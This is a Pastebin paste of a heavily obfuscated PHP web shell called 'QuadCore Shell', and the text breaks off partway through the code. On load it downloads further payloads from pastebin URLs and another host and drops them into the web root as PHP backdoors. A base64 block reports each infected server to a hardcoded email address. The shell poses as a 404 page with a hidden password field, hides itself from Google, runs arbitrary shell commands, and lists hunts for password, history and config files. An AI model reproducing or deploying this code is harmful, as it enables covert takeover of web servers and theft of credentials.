13Hackoeur

Untitled

Dec 30th, 2016
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 113.69 KB | None | 0 0
  1. <?php ${"GLOBALS"}["vmeqwtq"]="default_action";${"GLOBALS"}["rzmlvlno"]="fil";${"GLOBALS"}["tgqrrkgpda"]="cf14";${"GLOBALS"}["rvszrxig"]="cf07";${"GLOBALS"}["mwggguhfupqm"]="cf15";${"GLOBALS"}["lzohgiefu"]="ch15";${"GLOBALS"}["mkinpjzdgj"]="ch14";${"GLOBALS"}["pvfugjjup"]="c14";${"GLOBALS"}["ayzcdduspxm"]="c13";${"GLOBALS"}["gmnhmktamua"]="ch13";${"GLOBALS"}["prqoprzqir"]="ch12";${"GLOBALS"}["scqezcpcbs"]="cf12";${"GLOBALS"}["cnqaxcrxjq"]="c12";${"GLOBALS"}["cqypnwcvejv"]="ch11";${"GLOBALS"}["qhlejcv"]="cf11";${"GLOBALS"}["lbmmyubqyr"]="c11";${"GLOBALS"}["dkpunhessln"]="ch10";${"GLOBALS"}["pwtyteeb"]="c10";${"GLOBALS"}["vsfdkofjj"]="cf09";${"GLOBALS"}["ithzxlxrmlm"]="c9";${"GLOBALS"}["rerpayj"]="cf08";${"GLOBALS"}["kpjbcmarfuo"]="ch08";${"GLOBALS"}["wacdfrvwe"]="c8";${"GLOBALS"}["osoffgwmjltx"]="ch07";${"GLOBALS"}["smmeycn"]="c7";${"GLOBALS"}["vwwjwfjm"]="ch06";${"GLOBALS"}["wdhyaqetqa"]="c6";${"GLOBALS"}["komyeesyg"]="cf05";${"GLOBALS"}["andpbxkk"]="c5";${"GLOBALS"}["jplodscbxohk"]="ch05";${"GLOBALS"}["vfnfmdm"]="cf04";${"GLOBALS"}["nuxnihbyr"]="c4";${"GLOBALS"}["dwdsmzze"]="cf03";${"GLOBALS"}["curnjtdg"]="ch03";${"GLOBALS"}["kzgfuivbq"]="c3";${"GLOBALS"}["dejbygpc"]="c2";${"GLOBALS"}["sjwnuvys"]="c1";${"GLOBALS"}["xyvpqj"]="hdt";${"GLOBALS"}["txqtpuwu"]="ddt";${"GLOBALS"}["wbakgcf"]="domain";${"GLOBALS"}["mxbbodcwhf"]="mck";${"GLOBALS"}["odhvpydk"]="hfp";${"GLOBALS"}["urpgrdnda"]="count";${"GLOBALS"}["apyjin"]="domains";${"GLOBALS"}["pelfiuzp"]="d0main";${"GLOBALS"}["uptmndscp"]="unk";${"GLOBALS"}["jvpnlp"]="d0mains";${"GLOBALS"}["rlezpjvpmdc"]="expld";${"GLOBALS"}["tuxlvcs"]="burl";${"GLOBALS"}["ksfcsux"]="users";${"GLOBALS"}["htvreepkteq"]="dirz";${"GLOBALS"}["cytwbtmsifil"]="pos";${"GLOBALS"}["dmdvnsdri"]="username";${"GLOBALS"}["qtpmkxxs"]="conf";${"GLOBALS"}["ofemchnylx"]="pub";${"GLOBALS"}["dekgovck"]="sm";${"GLOBALS"}["lcltujgfsfbo"]="errno";${"GLOBALS"}["sxrhsclv"]="start";${"GLOBALS"}["ewvffcrq"]="t";${"GLOBALS"}["ijwldoj"]="w";${"GLOBALS"}["lcnlqellqg"]="bind_port_c";${"GLOBALS"}["nkaubjks"]="back_connect_c";${"GLOBALS"}["zegsuxtqof"]="file";${"GLOBALS"}["ldehnuiwej"]="key";${"GLOBALS"}["wxptpkqm"]="title";${"GLOBALS"}["tvqhpjyj"]="num";${"GLOBALS"}["ugmobgd"]="tbls_res";${"GLOBALS"}["siaqbqlto"]="value";${"GLOBALS"}["ydvbqrx"]="db";${"GLOBALS"}["moaajquhps"]="columns";${"GLOBALS"}["tivqaqwrlx"]="create";${"GLOBALS"}["zcitwlsk"]="table";${"GLOBALS"}["knqwqdn"]="str";${"GLOBALS"}["sdpydmesch"]="user";${"GLOBALS"}["fgjhbgumkz"]="line";${"GLOBALS"}["vgghlfejh"]="success";${"GLOBALS"}["twjwiejv"]="server";${"GLOBALS"}["bxqdwhtqdcu"]="ip";${"GLOBALS"}["yeesjqjffj"]="res";${"GLOBALS"}["nmnarf"]="login";${"GLOBALS"}["smkuajl"]="pass";${"GLOBALS"}["iyysmwscom"]="port";${"GLOBALS"}["ijqcddn"]="stream";${"GLOBALS"}["wlpmwwisxba"]="ch";${"GLOBALS"}["aymfqmtss"]="time";${"GLOBALS"}["jfsgiz"]="len";${"GLOBALS"}["skkjgstgu"]="perms";${"GLOBALS"}["ofsjzyplqvuh"]="code";${"GLOBALS"}["eqqfjdpz"]="fp";${"GLOBALS"}["jwviedbpy"]="type";${"GLOBALS"}["uohqkihp"]="stringTools";${"GLOBALS"}["jlptvbtp"]="r";${"GLOBALS"}["muwqirblho"]="l";${"GLOBALS"}["dcomrhopet"]="a";${"GLOBALS"}["tbknxya"]="b";${"GLOBALS"}["xdymgejnryr"]="links";${"GLOBALS"}["nvzkwquqtcv"]="ow";${"GLOBALS"}["kkcaes"]="dirs";${"GLOBALS"}["rlxsszdo"]="sort";${"GLOBALS"}["sqbcihxjwxc"]="match";${"GLOBALS"}["dtbigpgfvo"]="dirContent";${"GLOBALS"}["mewyajus"]="h";${"GLOBALS"}["kdlkocrcdp"]="d";${"GLOBALS"}["grdeva"]="c";${"GLOBALS"}["pmvkpva"]="tmp";${"GLOBALS"}["nfmvpmprpfm"]="userful";${"GLOBALS"}["mchkcbti"]="temp";${"GLOBALS"}["dyhbggvolpv"]="v";${"GLOBALS"}["kwvaxvtju"]="files";${"GLOBALS"}["mmanwsrndvkm"]="filename";${"GLOBALS"}["xlevutfqzr"]="dir";${"GLOBALS"}["yehwhksilho"]="s";${"GLOBALS"}["vjzfhubux"]="is_writable";${"GLOBALS"}["ykejbb"]="item2";${"GLOBALS"}["snoxmgdr"]="downloaders";${"GLOBALS"}["uslyvfq"]="dwnldr";${"GLOBALS"}["dyqnvtiwckc"]="usefl";${"GLOBALS"}["soeeuvcw"]="dominios";${"GLOBALS"}["uoamtt"]="drives";${"GLOBALS"}["qcztealr"]="k";${"GLOBALS"}["buydpdqgmu"]="menu";${"GLOBALS"}["acytmdtblk"]="m";${"GLOBALS"}["ikpgbmcrqw"]="item";${"GLOBALS"}["riiipkhqrnk"]="charsets";${"GLOBALS"}["txwhjszht"]="j";${"GLOBALS"}["ospofei"]="cwd_links";${"GLOBALS"}["unpqxrqvtt"]="n";${"GLOBALS"}["rcrtozri"]="i";${"GLOBALS"}["qmwipmg"]="group";${"GLOBALS"}["pkirecjc"]="uid";${"GLOBALS"}["uhbipydlr"]="gid";${"GLOBALS"}["lqdjebkshtjr"]="totalSpace";${"GLOBALS"}["ljspypl"]="freeSpace";${"GLOBALS"}["slcohc"]="color";${"GLOBALS"}["chpcnlbltty"]="p";${"GLOBALS"}["ohukdtuyelta"]="path";${"GLOBALS"}["itetujfjtui"]="f";${"GLOBALS"}["pffisbvtl"]="in";${"GLOBALS"}["ttiqfflposoq"]="out";${"GLOBALS"}["ntkzdzjgnsr"]="home_cwd";${"GLOBALS"}["hlrqgwqr"]="cwd";${"GLOBALS"}["bpfghlu"]="disable_functions";${"GLOBALS"}["fdqnlsmikm"]="auth_pass";${"GLOBALS"}["tjzhxalne"]="array";${"GLOBALS"}["dbkhjomwrf"]="check6";${"GLOBALS"}["rxrpmvi"]="text6";$gefoecr="os";${"GLOBALS"}["luglxvku"]="open6";$uxbjisc="safe_mode";${"GLOBALS"}["izgnascybvo"]="check5";${"GLOBALS"}["mnxukstlj"]="text3";${"GLOBALS"}["bgqptqgitc"]="check3";${"GLOBALS"}["uneyyncqfii"]="text2";$bcfuvpdn="check5";${"GLOBALS"}["djkvrfc"]="os";$mjxphl="encoded";${"GLOBALS"}["mhuejmkvo"]="open5";${"GLOBALS"}["nhtoobiin"]="check2";$lxqhdgr="open6";${"GLOBALS"}["tvruvoo"]="encoded";${"GLOBALS"}["imeeemn"]="open0";${"GLOBALS"}["benhtglk"]="text0";${"GLOBALS"}["seczgpy"]="open";${"GLOBALS"}["kyqcljgrm"]="cwd";${"GLOBALS"}["aggrkcnq"]="check";${"GLOBALS"}["juouiwjvujy"]="op3";${"GLOBALS"}["ktcoemnqubk"]="url";${"GLOBALS"}["rqrvoefnn"]="im";${"GLOBALS"}["hmlcsclspmu"]="check";${"GLOBALS"}["qnmkkyrcqj"]="open0";$vknfoo="open";${"GLOBALS"}["xwpryqnk"]="text";function http_get($url){${"GLOBALS"}["pqtujwpcg"]="im";$dhimajl="im";${${"GLOBALS"}["rqrvoefnn"]}=curl_init(${${"GLOBALS"}["ktcoemnqubk"]});curl_setopt(${${"GLOBALS"}["pqtujwpcg"]},CURLOPT_RETURNTRANSFER,1);${"GLOBALS"}["lsxsvkaa"]="im";curl_setopt(${$dhimajl},CURLOPT_CONNECTTIMEOUT,10);curl_setopt(${${"GLOBALS"}["lsxsvkaa"]},CURLOPT_FOLLOWLOCATION,1);curl_setopt(${${"GLOBALS"}["rqrvoefnn"]},CURLOPT_HEADER,0);${"GLOBALS"}["csiqcqq"]="im";return curl_exec(${${"GLOBALS"}["rqrvoefnn"]});curl_close(${${"GLOBALS"}["csiqcqq"]});}${"GLOBALS"}["scutwodho"]="check0";${"GLOBALS"}["ihjwlp"]="open2";${${"GLOBALS"}["aggrkcnq"]}=$_SERVER["DOCUMENT_ROOT"]."/up.php";${"GLOBALS"}["yofbmfhhsn"]="open6";$mjyeaatlrdy="check3";${"GLOBALS"}["cvfrmxvuke"]="open";$hoyfgihl="text";${"GLOBALS"}["qxjbzas"]="check0";${"GLOBALS"}["wvjwuozamgh"]="check";${"GLOBALS"}["btoxtsq"]="text2";${"GLOBALS"}["qoeyqivtw"]="default_action";${$hoyfgihl}=http_get("http://pastebin.com/raw/uUFM9h8Z");${${"GLOBALS"}["cvfrmxvuke"]}=fopen(${${"GLOBALS"}["wvjwuozamgh"]},"w");$ydfvyxdn="check6";fwrite(${$vknfoo},${${"GLOBALS"}["xwpryqnk"]});fclose(${${"GLOBALS"}["seczgpy"]});$mwltefvkrgf="text3";${"GLOBALS"}["sbxqdpweumm"]="home_cwd";${"GLOBALS"}["bwuoactk"]="text5";if(file_exists(${${"GLOBALS"}["hmlcsclspmu"]})){}else echo"";$npyxnqbcxq="check6";${${"GLOBALS"}["qxjbzas"]}=$_SERVER["DOCUMENT_ROOT"]."/xx1.php";$gqhhjzmrz="open2";$fdekkalypir="os";${${"GLOBALS"}["benhtglk"]}=http_get("http://pastebin.com/raw/3e7RmzMA");$cpmgdtkfq="check2";${${"GLOBALS"}["imeeemn"]}=fopen(${${"GLOBALS"}["scutwodho"]},"w");$ocjmgy="os";${"GLOBALS"}["xhsgpdxuu"]="op3";${"GLOBALS"}["dnfhnab"]="open5";fwrite(${${"GLOBALS"}["imeeemn"]},${${"GLOBALS"}["benhtglk"]});$jsuqhrtohvx="check0";fclose(${${"GLOBALS"}["qnmkkyrcqj"]});$eeqxdbuk="open2";if(file_exists(${$jsuqhrtohvx})){}else echo"";${${"GLOBALS"}["nhtoobiin"]}=$_SERVER["DOCUMENT_ROOT"]."/up1.php";$pjhrhrtsje="check5";${${"GLOBALS"}["uneyyncqfii"]}=http_get("http://pastebin.com/raw/dSucuQ7R");${$gqhhjzmrz}=fopen(${${"GLOBALS"}["nhtoobiin"]},"w");fwrite(${${"GLOBALS"}["ihjwlp"]},${${"GLOBALS"}["btoxtsq"]});fclose(${$eeqxdbuk});${"GLOBALS"}["zaytwywseook"]="op3";${"GLOBALS"}["sxgnhkgngkt"]="text6";if(file_exists(${$cpmgdtkfq})){}else echo"";${$mjyeaatlrdy}=$_SERVER["DOCUMENT_ROOT"]."/indexx.html";$zreejvb="text5";${$mwltefvkrgf}=http_get("http://xx.comlu.com/index.html");$inbkstu="open5";${${"GLOBALS"}["xhsgpdxuu"]}=fopen(${${"GLOBALS"}["bgqptqgitc"]},"w");fwrite(${${"GLOBALS"}["zaytwywseook"]},${${"GLOBALS"}["mnxukstlj"]});fclose(${${"GLOBALS"}["juouiwjvujy"]});$hyrsjvwh="cwd";if(file_exists(${${"GLOBALS"}["bgqptqgitc"]})){}else echo"";${$bcfuvpdn}=$_SERVER["DOCUMENT_ROOT"]."/up3.php";${$zreejvb}=http_get("http://pastebin.com/raw/LXDzzPn1");${${"GLOBALS"}["mhuejmkvo"]}=fopen(${$pjhrhrtsje},"w");fwrite(${$inbkstu},${${"GLOBALS"}["bwuoactk"]});fclose(${${"GLOBALS"}["dnfhnab"]});if(file_exists(${${"GLOBALS"}["izgnascybvo"]})){}else echo"";${$npyxnqbcxq}=$_SERVER["DOCUMENT_ROOT"]."/up2.php";${${"GLOBALS"}["sxgnhkgngkt"]}=http_get("http://pastebin.com/raw/dSucuQ7R");${$lxqhdgr}=fopen(${$ydfvyxdn},"w");fwrite(${${"GLOBALS"}["luglxvku"]},${${"GLOBALS"}["rxrpmvi"]});fclose(${${"GLOBALS"}["yofbmfhhsn"]});$fkwzfituiao="auth_pass";if(file_exists(${${"GLOBALS"}["dbkhjomwrf"]})){}else echo"";${$mjxphl}="JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQokaXBfcmVtb3RlID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokZnJvbV9zaGVsbGNvZGUgPSAnc2hlbGxAJy5nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKS4nJzsNCiR0b19lbWFpbCA9ICdicmF6aWxvYnNjdXJlQGxpdmUuY29tJzsNCiRzZXJ2ZXJfbWFpbCA9ICIiLmdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10pLiIgIC0gIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIiI7DQokbGlua2NyID0gIkxpbms6ICIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10uIiAtIElQIEV4Y3V0aW5nOiAkaXBfcmVtb3RlIC0gVGltZTogJHRpbWVfc2hlbGwiOw0KJGhlYWRlciA9ICJGcm9tOiAkZnJvbV9zaGVsbGNvZGVcclxuUmVwbHktdG86ICRmcm9tX3NoZWxsY29kZSI7DQpAbWFpbCgkdG9fZW1haWwsICRzZXJ2ZXJfbWFpbCwgJGxpbmtjciwgJGhlYWRlcik7==";eval(base64_decode(${${"GLOBALS"}["tvruvoo"]}));$bknxxkuytn="color";${$fkwzfituiao}="6098193147669a6c2acb24d72093ece0";${$bknxxkuytn}="00FF88";${${"GLOBALS"}["qoeyqivtw"]}="FilesMan";@define("SELF_PATH",__FILE__);if(strpos($_SERVER["HTTP_USER_AGENT"],"Google")!==false){header("HTTP/1.0 404 Not Found");exit;}@session_start();@error_reporting(0);@ini_set("error_log",NULL);@ini_set("display_errors",0);@ini_set("log_errors",0);@ini_set("max_execution_time",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("VERSION","");if(get_magic_quotes_gpc()){function stripslashes_array($array){$qviqqdlyd="array";$unhmjutxs="array";return is_array(${${"GLOBALS"}["tjzhxalne"]})?array_map("stripslashes_array",${$unhmjutxs}):stripslashes(${$qviqqdlyd});}$_POST=stripslashes_array($_POST);}function printLogin(){echo"<h1>Not Found</h1>
  2. <p>The requested URL was not found on this server.</p>
  3. <hr>
  4. <address>Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80</address>
  5. <style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
  6. <center><form method=post><input type=password name=pass></form></center>";exit;}if(!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])){${"GLOBALS"}["ceyitcfktt"]="auth_pass";if(empty(${${"GLOBALS"}["fdqnlsmikm"]})||(isset($_POST["pass"])&&(md5($_POST["pass"])==${${"GLOBALS"}["ceyitcfktt"]})))$_SESSION[md5($_SERVER["HTTP_HOST"])]=true;else printLogin();}if(strtolower(substr(PHP_OS,0,3))=="win")${${"GLOBALS"}["djkvrfc"]}="win";else${$gefoecr}="nix";${$uxbjisc}=@ini_get("safe_mode");${${"GLOBALS"}["bpfghlu"]}=@ini_get("disable_functions");${${"GLOBALS"}["sbxqdpweumm"]}=@getcwd();if(isset($_POST["c"]))@chdir($_POST["c"]);${${"GLOBALS"}["hlrqgwqr"]}=@getcwd();if(${$ocjmgy}=="win"){${"GLOBALS"}["unblmdexmtw"]="home_cwd";${${"GLOBALS"}["ntkzdzjgnsr"]}=str_replace("\","/",${${"GLOBALS"}["unblmdexmtw"]});${${"GLOBALS"}["hlrqgwqr"]}=str_replace("\","/",${${"GLOBALS"}["hlrqgwqr"]});}if(${$hyrsjvwh}[strlen(${${"GLOBALS"}["kyqcljgrm"]})-1]!="/")${${"GLOBALS"}["hlrqgwqr"]}.="/";if(${$fdekkalypir}=="win"){$aicsitcpwho="aliases";${$aicsitcpwho}=array("List Directory"=>"dir","Find index.php in current dir"=>"dir /s /w /b index.php","Find *config*.php in current dir"=>"dir /s /w /b *config*.php","Show active connections"=>"netstat -an","Show running services"=>"net start","User accounts"=>"net user","Show computers"=>"net view","ARP Table"=>"arp -a","IP Configuration"=>"ipconfig /all");}else{${"GLOBALS"}["gjjpfavgdgim"]="aliases";${${"GLOBALS"}["gjjpfavgdgim"]}=array("List dir"=>"ls -la","list file attributes on a Linux second extended file system"=>"lsattr -va","show opened ports"=>"netstat -an | grep -i listen","Find"=>"","find all suid files"=>"find / -type f -perm -04000 -ls","find suid files in current dir"=>"find . -type f -perm -04000 -ls","find all sgid files"=>"find / -type f -perm -02000 -ls","find sgid files in current dir"=>"find . -type f -perm -02000 -ls","find config.inc.php files"=>"find / -type f -name config.inc.php","find config* files"=>"find / -type f -name \"config*\"","find config* files in current dir"=>"find . -type f -name \"config*"","find all writable folders and files"=>"find / -perm -2 -ls","find all writable folders and files in current dir"=>"find . -perm -2 -ls","find all service.pwd files"=>"find / -type f -name service.pwd","find service.pwd files in current dir"=>"find . -type f -name service.pwd","find all .htpasswd files"=>"find / -type f -name .htpasswd","find .htpasswd files in current dir"=>"find . -type f -name .htpasswd","find all .bash_history files"=>"find / -type f -name .bash_history","find .bash_history files in current dir"=>"find . -type f -name .bash_history","find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc","find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc","Locate"=>"","locate httpd.conf files"=>"locate httpd.conf","locate vhosts.conf files"=>"locate vhosts.conf","locate proftpd.conf files"=>"locate proftpd.conf","locate psybnc.conf files"=>"locate psybnc.conf","locate my.conf files"=>"locate my.conf","locate admin.php files"=>"locate admin.php","locate cfg.php files"=>"locate cfg.php","locate conf.php files"=>"locate conf.php","locate config.dat files"=>"locate config.dat","locate config.php files"=>"locate config.php","locate config.inc files"=>"locate config.inc","locate config.inc.php"=>"locate config.inc.php","locate config.default.php files"=>"locate config.default.php","locate config* files "=>"locate config","locate .conf files"=>"locate '.conf'","locate .pwd files"=>"locate '.pwd'","locate .sql files"=>"locate '.sql'","locate .htpasswd files"=>"locate '.htpasswd'","locate .bash_history files"=>"locate '.bash_history'","locate .mysql_history files"=>"locate '.mysql_history'","locate .fetchmailrc files"=>"locate '.fetchmailrc'","locate backup files"=>"locate backup","locate dump files"=>"locate dump","locate priv files"=>"locate priv");}function ex($in){${${"GLOBALS"}["ttiqfflposoq"]}="";${"GLOBALS"}["deygnus"]="in";if(function_exists("exec")){$sorhwuuy="out";${"GLOBALS"}["hgyjapf"]="out";@exec(${${"GLOBALS"}["pffisbvtl"]},${$sorhwuuy});${${"GLOBALS"}["ttiqfflposoq"]}=@join("",${${"GLOBALS"}["hgyjapf"]});}elseif(function_exists("passthru")){$vrymst="out";ob_start();@passthru(${${"GLOBALS"}["pffisbvtl"]});${$vrymst}=ob_get_clean();}elseif(function_exists("system")){$pmgdfbnoqf="out";ob_start();@system(${${"GLOBALS"}["pffisbvtl"]});${$pmgdfbnoqf}=ob_get_clean();}elseif(function_exists("shell_exec")){${"GLOBALS"}["qvcankg"]="out";$xioeyrohi="in";${${"GLOBALS"}["qvcankg"]}=shell_exec(${$xioeyrohi});}elseif(is_resource(${${"GLOBALS"}["itetujfjtui"]}=@popen(${${"GLOBALS"}["deygnus"]},"r"))){$xtuhymdncafv="out";${$xtuhymdncafv}="";${"GLOBALS"}["dpkwvpsld"]="f";${"GLOBALS"}["baentvs"]="f";$kikylytokhg="f";while(!@feof(${${"GLOBALS"}["baentvs"]}))${${"GLOBALS"}["ttiqfflposoq"]}.=fread(${$kikylytokhg},1024);pclose(${${"GLOBALS"}["dpkwvpsld"]});}return${${"GLOBALS"}["ttiqfflposoq"]};}function which($p){${"GLOBALS"}["dksncaevyrnh"]="path";${${"GLOBALS"}["ohukdtuyelta"]}=ex("which ".${${"GLOBALS"}["chpcnlbltty"]});if(!empty(${${"GLOBALS"}["dksncaevyrnh"]}))return${${"GLOBALS"}["ohukdtuyelta"]};return false;}function printHeader(){${"GLOBALS"}["txoeflvte"]="release";if(empty($_POST["charset"]))$_POST["charset"]="UTF-8";global$color;$vjxjuoh="m";echo"<html><head><meta http-equiv=\"Content-Type\" content="text/html; charset=".$_POST["charset"]."\"><title>QuadCore Shell</title><link REL=\"SHORTCUT ICON" HREF=\"http://imagizer.imageshack.us/a/img440/4273/6fix.png\">
  7. <style>
  8. body {background-color:#222;color:#fff;}
  9. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  10. span,h1,a { color:".${${"GLOBALS"}["slcohc"]}." !important; }
  11. span { font-weight: bolder; }
  12. h1 { padding: 2px 5px;font: 14pt Verdana;margin:0px 0 0 5px; }
  13. div.content { padding: 5px;margin:0 5px;background: #333333;border-bottom:5px solid #444;}
  14. a { text-decoration:none; }
  15. a:hover { /*background:#5e5e5e;*/ }
  16. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  17. .bigarea { width:100%;height:250px;margin-top:5px;}
  18. input, textarea, select { margin:0;color:#00FFFF;background-color:#555;border:1px solid ".${${"GLOBALS"}["slcohc"]}."; font: 9pt Monospace,\"Courier New"; }
  19. input[type="button"]:hover,input[type=\"submit"]:hover {background-color:".${${"GLOBALS"}["slcohc"]}.";color:#000;}
  20. form { margin:0px; }
  21. #toolsTbl { text-align:center; }
  22. .toolsInp { width: 80%; }
  23. .main th {text-align:left;background-color:#555;font-weight: bold;}
  24. .main tr:hover{background-color:#5e5e5e;}
  25. .main td, th{vertical-align:middle;}
  26. .menu {background: #333;}
  27. .menu th{padding:5px;font-weight:bold;}
  28. .menu th:hover{background:#444;}
  29. .l1 {background-color:#444;}
  30. pre {font-family:Courier,Monospace;}
  31. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  32. .logo {text-align:center;font-size:60px;}
  33. .logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
  34. .cpr {margin-bottom:5px;font-weight:bold;}
  35. .cpb {width:34px;margin:0 5px;}
  36. .eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
  37. .eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
  38. .npoad td {padding:0;}
  39. </style>
  40. <script>
  41. function set(a,c,p1,p2,p3,charset) {
  42. if(a != null)document.mf.a.value=a;
  43. if(c != null)document.mf.c.value=c;
  44. if(p1 != null)document.mf.p1.value=p1;
  45. if(p2 != null)document.mf.p2.value=p2;
  46. if(p3 != null)document.mf.p3.value=p3;
  47. if(charset != null)document.mf.charset.value=charset;
  48. }
  49. function g(a,c,p1,p2,p3,charset) {
  50. set(a,c,p1,p2,p3,charset);
  51. document.mf.submit();
  52. }
  53. function a(a,c,p1,p2,p3,charset) {
  54. set(a,c,p1,p2,p3,charset);
  55. var params = \"ajax=true\";
  56. for(i=0;i<document.mf.elements.length;i++)
  57. params += \"&"+document.mf.elements[i].name+"=\"+encodeURIComponent(document.mf.elements[i].value);
  58. sr("".$_SERVER["REQUEST_URI"]."\", params);
  59. }
  60. function sr(url, params) {
  61. if (window.XMLHttpRequest) {
  62. req = new XMLHttpRequest();
  63. req.onreadystatechange = processReqChange;
  64. req.open("POST\", url, true);
  65. req.setRequestHeader (\"Content-Type", \"application/x-www-form-urlencoded");
  66. req.send(params);
  67. }
  68. else if (window.ActiveXObject) {
  69. req = new ActiveXObject("Microsoft.XMLHTTP\");
  70. if (req) {
  71. req.onreadystatechange = processReqChange;
  72. req.open("POST", url, true);
  73. req.setRequestHeader ("Content-Type", \"application/x-www-form-urlencoded\");
  74. req.send(params);
  75. }
  76. }
  77. }
  78. function processReqChange() {
  79. if( (req.readyState == 4) )
  80. if(req.status == 200) {
  81. //alert(req.responseText);
  82. var reg = new RegExp("(\d+)([\S\s]*)", "m\");
  83. var arr=reg.exec(req.responseText);
  84. eval(arr[2].substr(0, arr[1]));
  85. }
  86. else alert("Request error!\");
  87. }
  88. </script>
  89. <head><body><div style="position:absolute;width:100%;top:0;left:0;\"><div style=\"margin:5px;background:#444;\"><div class=\"content\" style=\"border-top:5px solid #444;">
  90. <form method=post name=mf style="display:none;\">
  91. <input type=hidden name=a value="".(isset($_POST["a"])?$_POST["a"]:"")."\">
  92. <input type=hidden name=c value=\"".htmlspecialchars($GLOBALS["cwd"])."">
  93. <input type=hidden name=p1 value=\"".(isset($_POST["p1"])?htmlspecialchars($_POST["p1"]):"")."\">
  94. <input type=hidden name=p2 value=\"".(isset($_POST["p2"])?htmlspecialchars($_POST["p2"]):"")."\">
  95. <input type=hidden name=p3 value=\"".(isset($_POST["p3"])?htmlspecialchars($_POST["p3"]):"")."\">
  96. <input type=hidden name=charset value=\"".(isset($_POST["charset"])?$_POST["charset"]:"")."\">
  97. </form>";${"GLOBALS"}["izpnkqej"]="item";$yukcgbcombiu="totalSpace";${"GLOBALS"}["mkmdyhd"]="totalSpace";${"GLOBALS"}["lmowkp"]="v";${"GLOBALS"}["pbelxkrkfq"]="i";$wweissd="charsets";$ntsynqc="opt_charsets";${${"GLOBALS"}["ljspypl"]}=@diskfreespace($GLOBALS["cwd"]);$nkpbnzr="totalSpace";${"GLOBALS"}["ohwplvci"]="color";$clxfbgcoi="item";${"GLOBALS"}["gbgbvwp"]="m";${"GLOBALS"}["hohuzjqym"]="n";${${"GLOBALS"}["mkmdyhd"]}=@disk_total_space($GLOBALS["cwd"]);$ttdrjqhdxg="cwd_links";${$yukcgbcombiu}=${${"GLOBALS"}["lqdjebkshtjr"]}?${$nkpbnzr}:1;${"GLOBALS"}["uawlgehqpbmw"]="menu";$cnigjdc="kernel";${${"GLOBALS"}["bpfghlu"]}=@ini_get("disable_functions");${${"GLOBALS"}["txoeflvte"]}=@php_uname("r");${$cnigjdc}=@php_uname("s");$skkttkp="cwd_links";${"GLOBALS"}["sgigkayhf"]="usefl";if(!function_exists("posix_getegid")){${"GLOBALS"}["uwtyioxe"]="uid";$drlhsousdqv="user";${"GLOBALS"}["jbuyafgtiv"]="group";${$drlhsousdqv}=@get_current_user();${${"GLOBALS"}["uwtyioxe"]}=@getmyuid();${${"GLOBALS"}["uhbipydlr"]}=@getmygid();${${"GLOBALS"}["jbuyafgtiv"]}="?";}else{${"GLOBALS"}["ulkxylc"]="gid";$qiykwt="gid";${"GLOBALS"}["kpfmqeyjqnm"]="uid";${"GLOBALS"}["hqklciuswi"]="uid";$qkbmxmnltfj="uid";${$qkbmxmnltfj}=@posix_getpwuid(@posix_geteuid());${$qiykwt}=@posix_getgrgid(@posix_getegid());${"GLOBALS"}["xsyquevg"]="user";${${"GLOBALS"}["xsyquevg"]}=${${"GLOBALS"}["hqklciuswi"]}["name"];${${"GLOBALS"}["pkirecjc"]}=${${"GLOBALS"}["kpfmqeyjqnm"]}["uid"];${${"GLOBALS"}["qmwipmg"]}=${${"GLOBALS"}["ulkxylc"]}["name"];${${"GLOBALS"}["uhbipydlr"]}=${${"GLOBALS"}["uhbipydlr"]}["gid"];}$ydlhbr="i";${"GLOBALS"}["tgnxfsjmkx"]="dwnldr";${$skkttkp}="";$lvtzwlhd="totalSpace";$oklsvwwq="item";${${"GLOBALS"}["ohukdtuyelta"]}=explode("/",$GLOBALS["cwd"]);${${"GLOBALS"}["hohuzjqym"]}=count(${${"GLOBALS"}["ohukdtuyelta"]});${"GLOBALS"}["gokbihttud"]="disable_functions";for(${$ydlhbr}=0;${${"GLOBALS"}["rcrtozri"]}<${${"GLOBALS"}["unpqxrqvtt"]}-1;${${"GLOBALS"}["pbelxkrkfq"]}++){${"GLOBALS"}["vslxdorb"]="j";$reatblujlj="cwd_links";${${"GLOBALS"}["ospofei"]}.="<a href='#' onclick='g("FilesMan\",\"";for(${${"GLOBALS"}["vslxdorb"]}=0;${${"GLOBALS"}["txwhjszht"]}<=${${"GLOBALS"}["rcrtozri"]};${${"GLOBALS"}["txwhjszht"]}++)${$reatblujlj}.=${${"GLOBALS"}["ohukdtuyelta"]}[${${"GLOBALS"}["txwhjszht"]}]."/";${${"GLOBALS"}["ospofei"]}.="\")'>".${${"GLOBALS"}["ohukdtuyelta"]}[${${"GLOBALS"}["rcrtozri"]}]."/</a>";}${"GLOBALS"}["dxsdeiiaxewr"]="opt_charsets";${"GLOBALS"}["oblbuzmw"]="d0c";${"GLOBALS"}["tsmxmkykzdy"]="disable_functions";${${"GLOBALS"}["riiipkhqrnk"]}=array("UTF-8","Windows-1251","KOI8-R","KOI8-U","cp866");${"GLOBALS"}["rpdeiuwr"]="gid";$eflekfzl="k";$ibixotufm="user";${${"GLOBALS"}["dxsdeiiaxewr"]}="";foreach(${$wweissd} 